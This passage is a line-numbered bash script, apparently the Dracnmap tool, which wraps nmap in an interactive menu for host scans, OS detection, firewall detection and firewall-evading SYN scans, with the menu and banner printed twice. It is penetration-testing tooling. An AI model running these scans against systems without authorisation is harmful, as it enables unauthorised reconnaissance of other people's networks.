-e $white " " 3024 | echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN " 3025 | echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS " 3026 | echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE " 3027 | echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL " 3028 | echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS " 3029 | echo -e $white" [$okegreen"06"$white]$cyan PING PING !! " 3030 | echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES" 3031 | echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED " 3032 | echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) " 3033 | echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES" 3034 | echo -e $white" [$okegreen"11"$white]$cyan CREDITS " 3035 | echo -e $white" [$okegreen"12"$white]$cyan EXIT " 3036 | echo -e " " 3037 | echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice 3038 | read Dracnmap 3039 | if test $Dracnmap == '1' 3040 | then 3041 | echo -e $cyan"" 3042 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3043 | read ip 3044 | $urxvt $ip & 3045 | 3046 | elif test $Dracnmap == '2' 3047 | then 3048 | echo "" 3049 | echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0 3050 | read ip1 3051 | echo "" 3052 | echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0 3053 | read ip2 3054 | echo "" 3055 | echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0 3056 | read ip3 3057 | echo "" 3058 | $urxvt $ip1 $ip2 $ip3 & 3059 | 3060 | elif test $Dracnmap == '3' 3061 | then 3062 | echo -e $cyan"" 3063 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3064 | read ip 3065 | $urxvt -sV -T4 -O -F --version-light 1 $ip & 3066 | 3067 | 3068 | elif test $Dracnmap == '4' 3069 | then 3070 | echo -e $cyan"" 3071 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3072 | read ip 3073 | $urxvt nmap -sA $ip & 3074 | 3075 | elif test $Dracnmap == '5' 3076 | then 3077 | echo -e $cyan"" 3078 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3079 | read ip 3080 | $urxvt -sS -P0 $ip & 3081 | 3082 | elif test $Dracnmap == '6' 3083 | then 3084 | pingbebeb 3085 | 3086 | elif test $Dracnmap == '7' 3087 | then 3088 | WebService 3089 | 3090 | elif test $Dracnmap == '8' 3091 | then 3092 | nse 3093 | 3094 | elif test $Dracnmap == '9' 3095 | then 3096 | zenmapscript 3097 | 3098 | elif test $Dracnmap == '10' 3099 | then 3100 | scanoutput 3101 | 3102 | elif test $Dracnmap == '11' 3103 | then 3104 | credits 3105 | 3106 | elif test $Dracnmap == '12' 3107 | then 3108 | clear 3109 | sleep 1 3110 | echo "" 3111 | echo -e $yellow"[*] Thank You For Using Dracnmap =)." 3112 | echo "" 3113 | echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." 3114 | exit 3115 | 3116 | else 3117 | echo -e " Incorrect Number" 3118 | fi 3119 | echo -n -e " Do you want exit? ( Yes / No ) :" 3120 | read back 3121 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 3122 | then 3123 | clear 3124 | exit 3125 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 3126 | then 3127 | menu 3128 | fi 3129 | 3130 | } 3131 | 3132 | #################################################### 3133 | # BANNER 3134 | #################################################### 3135 | clear 3136 | echo -e $red "" 3137 | echo " 80G08 " 3138 | echo " 8G#G@8 " 3139 | echo " 8##0 " 3140 | echo " 0##G8 " 3141 | echo " ####08 " 3142 | echo " 8#####8 " 3143 | echo " G#####8 " 3144 | echo " 8G#####8 " 3145 | echo " #8#########0 #######8 " 3146 | echo " 8#######0 0#88##### " 3147 | echo " 8G####8 8 8#8@@8### " 3148 | echo " 8### G8 8@G###### " 3149 | echo " 8##88 8 8######8 " 3150 | echo " G##088 80G##G080 " 3151 | echo " 88000000008880# 000 " 3152 | echo " 9 0 " 3153 | echo -e $okegreen" .___ _______ "; 3154 | echo " __| _/___________ ____ \ \ _____ _____ ______ "; 3155 | echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ "; 3156 | echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >"; 3157 | echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ "; 3158 | echo " \/ \/ \/ \/ \/ \/|__| "; 3159 | echo "" 3160 | echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) " 3161 | echo -e $cyan" Version $white":" $red $Version " 3162 | echo -e $cyan" Codename $white":" $red $Codename " 3163 | echo -e $cyan" Follow me on Github $white":" $red @Screetsec " 3164 | echo -e $cyan" Dracos Linux $white":" $red dracos-linux.org " 3165 | echo -e $cyan "" 3166 | echo -e $okegreen" ========================================================= "; 3167 | echo -e $white " " 3168 | echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN " 3169 | echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS " 3170 | echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE " 3171 | echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL " 3172 | echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS " 3173 | echo -e $white" [$okegreen"06"$white]$cyan PING PING !! " 3174 | echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES" 3175 | echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED " 3176 | echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) " 3177 | echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES" 3178 | echo -e $white" [$okegreen"11"$white]$cyan CREDITS " 3179 | echo -e $white" [$okegreen"12"$white]$cyan EXIT " 3180 | echo -e " " 3181 | echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice 3182 | read Dracnmap 3183 | if test $Dracnmap == '1' 3184 | then 3185 | echo -e $cyan"" 3186 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3187 | read ip 3188 | $urxvt $ip & 3189 | 3190 | elif test $Dracnmap == '2' 3191 | then 3192 | echo "" 3193 | echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0 3194 | read ip1 3195 | echo "" 3196 | echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0 3197 | read ip2 3198 | echo "" 3199 | echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0 3200 | read ip3 3201 | echo "" 3202 | $urxvt $ip1 $ip2 $ip3 & 3203 | 3204 | elif test $Dracnmap == '3' 3205 | then 3206 | echo -e $cyan"" 3207 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3208 | read ip 3209 | $urxvt -sV -T4 -O -F --version-light 1 $ip & 3210 | 3211 | 3212 | elif test $Dracnmap == '4' 3213 | then 3214 | echo -e $cyan"" 3215 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3216 | read ip 3217 | $urxvt nmap -sA $ip & 3218 | 3219 | elif test $Dracnmap == '5' 3220 | then 3221 | echo -e $cyan"" 3222 | echo -ne " What is your IP Target or Host: " ; tput sgr0 3223 | read ip 3224 | $urxvt -sS -P0 $ip & 3225 | 3226 | elif test $Dracnmap == '6' 3227 | then 3228 | pingbebeb 3229 | 3230 | elif test $Dracnmap == '7' 3231 | then 3232 | WebService 3233 | 3234 | elif test $Dracnmap == '8' 3235 | then 3236 | nse 3237 | 3238 | elif test $Dracnmap == '9' 3239 | then 3240 | zenmapscript 3241 | 3242 | elif test $Dracnmap == '10' 3243 | then 3244 | scanoutput 3245 | 3246 | elif test $Dracnmap == '11' 3247 | then 3248 | credits 3249 | 3250 | elif test $Dracnmap == '12' 3251 | then 3252 | clear 3253 | sleep 1 3254 | echo "" 3255 | echo -e $yellow"[*] Thank You For Using Dracnmap =)." 3256 | echo "" 3257 | echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." 3258 | exit 3259 | 3260 | else 3261 | echo -e " Incorrect Number" 3262 | fi 3263 | echo -n -e " Do you want exit? ( Yes / No ) :" 3264 | read back 3265 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 3266 | then 3267 | clear 3268 | exit 3269 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 3270 | then 3271 | menu 3272 | fi 3273 | --------------------------------------------------------------------------------